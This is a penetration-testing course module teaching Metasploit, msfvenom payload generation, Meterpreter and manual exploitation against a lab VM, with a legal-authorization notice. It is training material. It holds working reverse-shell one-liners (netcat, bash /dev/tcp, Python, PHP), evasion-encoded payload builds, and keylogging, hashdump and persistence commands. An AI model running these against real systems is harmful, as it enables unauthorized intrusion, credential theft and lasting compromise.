Stage 08 — Exploitation Fundamentals
Gaining Initial Access Through Controlled Exploitation
Certified Ethical Hacking I Learning Path Audience: Learners who have completed Stages 00-07Welcome to Stage 08. You've found vulnerabilities—now it's time to prove their impact through controlled exploitation. This stage teaches the Metasploit Framework, payload generation, and establishing access to target systems.
⚠️ Critical Legal and Ethical Notice
ONLY exploit systems you own or have explicit written authorization to test.Unauthorized exploitation is illegal and can result in criminal prosecution, civil liability, and career destruction.
In this course, you will ONLY exploit:- Metasploitable 2 (your own VM)
- Other intentionally vulnerable VMs you control
- Systems with written authorization
Prerequisites
- [ ] Completed Stages 00-07
- [ ] Understand vulnerability analysis
- [ ] Metasploitable 2 running and accessible
- [ ] Comfortable with command line
What You Will Learn
- Understand exploitation concepts
- Navigate and use Metasploit Framework
- Search for and select exploits
- Configure and execute exploits safely
- Generate payloads with msfvenom
- Establish reverse and bind shells
- Document exploitation professionally
Time Estimate: 40-50 hours
Part 1 — Exploitation Concepts (Milestone 1)
What is Exploitation?
Exploitation is taking advantage of a vulnerability to achieve unauthorized access.
┌─────────────────────────────────────────────────────────────────┐
│ Exploitation Process │
├─────────────────────────────────────────────────────────────────┤
│ │
│ VULNERABILITY ──► EXPLOIT ──► PAYLOAD ──► ACCESS │
│ │ │ │ │ │
│ ▼ ▼ ▼ ▼ │
│ Weakness Code that Code that Attacker │
│ in target triggers runs after achieves │
│ the vuln success objective │
│ │
│ Example: │
│ Buffer overflow ──► Exploit ──► Reverse ──► Shell on │
│ in vsftpd code shell target │
│ │
└─────────────────────────────────────────────────────────────────┘
Key Terminology
| Term | Definition |
|------|------------|
| Exploit | Code that takes advantage of a vulnerability |
| Payload | Code that runs after successful exploitation |
| Shellcode | Low-level payload, often for shell access |
| Listener | Service waiting for connections |
| Handler | Metasploit component managing payloads |
| Session | Active connection to compromised system |
| Stager | Small payload that downloads larger payload |
| Stage | Larger payload downloaded by stager |
Payload Types
┌─────────────────────────────────────────────────────────────────┐
│ Payload Types │
├─────────────────────────────────────────────────────────────────┤
│ │
│ REVERSE SHELL │
│ ├── Target connects BACK to attacker │
│ ├── Attacker sets up listener │
│ ├── Bypasses inbound firewall rules │
│ └── Most commonly used │
│ │
│ BIND SHELL │
│ ├── Target opens port, waits for attacker │
│ ├── Attacker connects to target │
│ ├── May be blocked by firewall │
│ └── Less common now │
│ │
│ METERPRETER │
│ ├── Advanced Metasploit payload │
│ ├── In-memory execution │
│ ├── Encrypted communication │
│ ├── Rich feature set │
│ └── Standard for Metasploit │
│ │
└─────────────────────────────────────────────────────────────────┘
Part 2 — Metasploit Framework Fundamentals (Milestone 2)
What is Metasploit?
The Metasploit Framework is the world's most used penetration testing tool:
- 2000+ exploits
- 500+ payloads
- Auxiliary modules for scanning
- Post-exploitation modules
- Meterpreter advanced payload
Starting Metasploit
# Start the database
sudo systemctl start postgresql
Initialize database (first time)
sudo msfdb init
Start Metasploit console
msfconsole
With quiet mode
msfconsole -q
Metasploit Architecture
┌─────────────────────────────────────────────────────────────────┐
│ Metasploit Module Types │
├─────────────────────────────────────────────────────────────────┤
│ │
│ EXPLOITS │
│ └── Code to exploit vulnerabilities │
│ │
│ PAYLOADS │
│ ├── Singles - Self-contained, small │
│ ├── Stagers - Setup communication channel │
│ └── Stages - Larger payload components │
│ │
│ AUXILIARY │
│ └── Scanning, fuzzing, DoS, etc. │
│ │
│ POST │
│ └── Post-exploitation modules │
│ │
│ ENCODERS │
│ └── Obfuscate payloads │
│ │
│ NOPS │
│ └── Keep payload size consistent │
│ │
└─────────────────────────────────────────────────────────────────┘
Basic Commands
# Help
msf6 > help
Search for modules
msf6 > search [keyword]
msf6 > search type:exploit name:vsftpd
msf6 > search cve:2017-0144
Use a module
msf6 > use exploit/unix/ftp/vsftpd_234_backdoor
Show options
msf6 exploit(vsftpd_234_backdoor) > show options
msf6 exploit(vsftpd_234_backdoor) > show payloads
msf6 exploit(vsftpd_234_backdoor) > show targets
Set options
msf6 exploit(vsftpd_234_backdoor) > set RHOSTS 192.168.56.101
msf6 exploit(vsftpd_234_backdoor) > set LHOST 192.168.56.1
Get info
msf6 exploit(vsftpd_234_backdoor) > info
Run exploit
msf6 exploit(vsftpd_234_backdoor) > exploit
msf6 exploit(vsftpd_234_backdoor) > run
Background session
meterpreter > background
List sessions
msf6 > sessions -l
Interact with session
msf6 > sessions -i 1
Kill session
msf6 > sessions -k 1
Workspace Management
# List workspaces
msf6 > workspace
Create workspace
msf6 > workspace -a engagement_name
Switch workspace
msf6 > workspace engagement_name
Delete workspace
msf6 > workspace -d engagement_name
Part 3 — Exploitation Workflow (Milestone 3)
Standard Workflow
1. SEARCH for exploit
search vsftpd
- USE the exploit
use exploit/unix/ftp/vsftpd_234_backdoor
- SHOW options and set required values
show options
set RHOSTS 192.168.56.101
- SELECT payload (if needed)
show payloads
set PAYLOAD cmd/unix/interact
- VERIFY settings
show options
- EXECUTE
exploit
Hands-On: First Exploitation
# Start Metasploit
msfconsole -q
Exploit vsftpd 2.3.4 backdoor on Metasploitable
msf6 > use exploit/unix/ftp/vsftpd_234_backdoor
msf6 exploit(vsftpd_234_backdoor) > set RHOSTS 192.168.56.101
msf6 exploit(vsftpd_234_backdoor) > show options
msf6 exploit(vsftpd_234_backdoor) > exploit
You should get a shell
whoami
id
hostname
Common Metasploitable Exploits
# vsftpd 2.3.4 Backdoor
use exploit/unix/ftp/vsftpd_234_backdoor
set RHOSTS [target]
exploit
Samba usermap_script
use exploit/multi/samba/usermap_script
set RHOSTS [target]
exploit
distcc Daemon
use exploit/unix/misc/distcc_exec
set RHOSTS [target]
exploit
IRC UnrealIRCd Backdoor
use exploit/unix/irc/unreal_ircd_3281_backdoor
set RHOSTS [target]
exploit
Java RMI
use exploit/multi/misc/java_rmi_server
set RHOSTS [target]
exploit
Part 4 — Payload Generation with msfvenom (Milestone 4)
What is msfvenom?
msfvenom generates payloads for use outside of Metasploit:
- Standalone executables
- Shellcode for exploits
- Web shells
- Various formats
Basic Usage
# List payloads
msfvenom -l payloads
List formats
msfvenom -l formats
List encoders
msfvenom -l encoders
Generate Windows reverse shell
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.56.1 LPORT=4444 -f exe > shell.exe
Generate Linux reverse shell
msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=192.168.56.1 LPORT=4444 -f elf > shell.elf
Generate PHP reverse shell
msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.56.1 LPORT=4444 -f raw > shell.php
Generate Python reverse shell
msfvenom -p python/meterpreter/reverse_tcp LHOST=192.168.56.1 LPORT=4444 -f raw > shell.py
With encoding (evasion)
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.56.1 LPORT=4444 -e x86/shikata_ga_nai -i 5 -f exe > encoded.exe
Common Payloads
| Payload | Use Case |
|---------|----------|
| windows/meterpreter/reverse_tcp | Windows, full features |
| windows/shell/reverse_tcp | Windows, basic shell |
| linux/x86/meterpreter/reverse_tcp | Linux x86, full features |
| linux/x64/shell_reverse_tcp | Linux x64, basic shell |
| php/meterpreter/reverse_tcp | Web server exploitation |
| java/meterpreter/reverse_tcp | Java environments |
Setting Up Handler
# Start handler for your payload
msfconsole -q
msf6 > use exploit/multi/handler
msf6 exploit(handler) > set PAYLOAD windows/meterpreter/reverse_tcp
msf6 exploit(handler) > set LHOST 192.168.56.1
msf6 exploit(handler) > set LPORT 4444
msf6 exploit(handler) > exploit -j # Run as job (background)
Hands-On: Payload Generation
# Generate a Linux payload
msfvenom -p linux/x86/shell_reverse_tcp LHOST=192.168.56.1 LPORT=4444 -f elf > ~/security-lab/payloads/shell.elf
Make executable
chmod +x ~/security-lab/payloads/shell.elf
Set up listener
nc -lvp 4444
On target (simulated), execute payload
./shell.elf
Part 5 — Meterpreter (Milestone 5)
What is Meterpreter?
Meterpreter is Metasploit's advanced payload:
- Runs entirely in memory
- Encrypted communication
- Extensible with modules
- Powerful post-exploitation
Essential Meterpreter Commands
# System info
meterpreter > sysinfo
meterpreter > getuid
meterpreter > getpid
File system
meterpreter > pwd
meterpreter > cd /tmp
meterpreter > ls
meterpreter > cat /etc/passwd
meterpreter > download /etc/passwd
meterpreter > upload /path/to/file.txt
Process management
meterpreter > ps
meterpreter > migrate [PID]
meterpreter > kill [PID]
Network
meterpreter > ipconfig
meterpreter > netstat
meterpreter > portfwd add -l 8080 -p 80 -r 127.0.0.1
Shell access
meterpreter > shell # Drop to system shell
meterpreter > execute -f cmd.exe -i -H
Screenshots and keylogging
meterpreter > screenshot
meterpreter > keyscan_start
meterpreter > keyscan_dump
Privilege escalation
meterpreter > getsystem
meterpreter > run post/multi/recon/local_exploit_suggester
Persistence
meterpreter > run persistence -h
Hashdump (Windows)
meterpreter > hashdump
Background
meterpreter > background
Part 6 — Manual Exploitation (Milestone 6)
Netcat Shells
# Listener (attacker)
nc -lvp 4444
Reverse shell (target)
nc -e /bin/bash [attacker_ip] 4444
If nc doesn't have -e
rm /tmp/f; mkfifo /tmp/f; cat /tmp/f | /bin/sh -i 2>&1 | nc [attacker_ip] 4444 > /tmp/f
Bash Reverse Shell
# On target
bash -i >& /dev/tcp/[attacker_ip]/4444 0>&1
Python Reverse Shell
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("[attacker_ip]",4444));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);subprocess.call(["/bin/sh","-i"])'
PHP Reverse Shell
<?php exec("/bin/bash -c 'bash -i >& /dev/tcp/[attacker_ip]/4444 0>&1'"); ?>
Upgrading Shells
# Upgrade to TTY
python -c 'import pty; pty.spawn("/bin/bash")'
python3 -c 'import pty; pty.spawn("/bin/bash")'
Full TTY upgrade
In reverse shell:
python3 -c 'import pty; pty.spawn("/bin/bash")'
Ctrl+Z
On attacker:
stty raw -echo; fg
Back in shell:
export TERM=xterm
Part 7 — Exploitation Documentation (Milestone 7)
What to Document
Every exploitation attempt should be documented:
- Target information
- Vulnerability exploited
- Exploit used
- Payload configuration
- Evidence of access
- Commands executed
Documentation Template
# Exploitation Report
Target
- IP: 192.168.56.101
- Service: vsftpd 2.3.4
- Port: 21
Vulnerability
- CVE: CVE-2011-2523
- Description: vsftpd 2.3.4 backdoor command execution
Exploitation
Exploit Used
exploit/unix/ftp/vsftpd_234_backdoor
Configuration
Execution
Evidence of Access
id
uid=0(root) gid=0(root)
hostname
metasploitable
Impact
- Full root access obtained
- Complete system compromise
- Access to all files and data
Recommendations
- Update vsftpd to latest version
- Remove backdoored version
- Audit for unauthorized access
Stage 08 Assessment
Written Assessment
- What is the difference between an exploit and a payload?
- Explain reverse shell vs bind shell.
- What is Meterpreter and why is it preferred?
- How do you search for exploits in Metasploit?
- What is msfvenom used for?
- How do you set up a handler for a payload?
- List five essential Meterpreter commands.
- How do you upgrade a basic shell to TTY?
- What must be documented during exploitation?
- Why is exploitation documentation important?
Practical Assessment
- Exploit at least three services on Metasploitable
- Generate a custom payload with msfvenom
- Establish and interact with a Meterpreter session
- Create manual reverse shell without Metasploit
- Document all exploitation with evidence
Stage 08 Completion Checklist
- [ ] Understand exploitation concepts
- [ ] Can navigate Metasploit Framework
- [ ] Can search for and use exploits
- [ ] Can configure payloads
- [ ] Can use msfvenom
- [ ] Can use Meterpreter
- [ ] Can create manual shells
- [ ] Can document exploitation properly
What's Next: Stage 09 Preview
In Stage 09 — Post-Exploitation Concepts, you will:
- Understand post-exploitation objectives
- Learn privilege escalation techniques
- Understand persistence concepts
- Learn about lateral movement
Commit and proceed when ready:
cd ~/security-lab
git add .
git commit -m "Complete Stage 08 - Exploitation Fundamentals"